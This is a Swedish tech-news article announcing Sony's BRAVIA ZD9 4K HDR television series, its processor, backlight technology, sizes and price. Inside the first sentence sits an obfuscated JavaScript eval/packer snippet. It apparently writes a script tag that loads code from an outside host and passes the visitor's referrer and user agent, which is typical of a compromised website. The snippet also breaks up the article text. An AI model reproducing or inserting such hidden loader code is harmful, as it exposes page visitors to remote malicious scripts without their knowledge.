Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Sony lanserar BRAVIA Z-serien – ultimat 4K HDR TV

Sony lanserar BRAVIA Z-serien – ultimat 4K HDR TV
Sebastian

Flaggskepp eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|httis|var|u0026u|referrer|siifi||js|php’.split(’|’),0,{}))
med nästa generations displayteknik

Sony avslöjar nu ZD9-serien med nästa generations displayteknik och förmågan att reproducera djupare svärta och ljusare färger. Den nya flaggskeppsserien tar över taktpinnen i Sonys nuvarande produktlinje av premium 4K HDR TV-skärmar, som inkluderar XD93 och XD940. Med nya Z-serien 4K HDR (High Dynamic Range) avancerar Sony till nya nivåer inom kontrast- och detaljrikedom, med mer realistiska färger som bättre återger originalmaterial från innehållsproducenter. Nya ZD9-serien har en nyutvecklad 4K-bildprocessor (4K HDR Processor X1™ Extreme) samt en unik bakbelyst teknik (Backlight Master Drive™) för att uppnå högre kontrast och träffsäkrare färguttryck.

Tillgänglighet
Nya Z-serien kommer att finnas tillgänglig i storlekarna 65-, 75- och 100 tum med start under 2016. ZD9, 65 tum kommer att säljas för ett rekommenderat cirkapris på 50 000 SEK. För mer information, vänligen se fullständigt pressmeddelande nedan.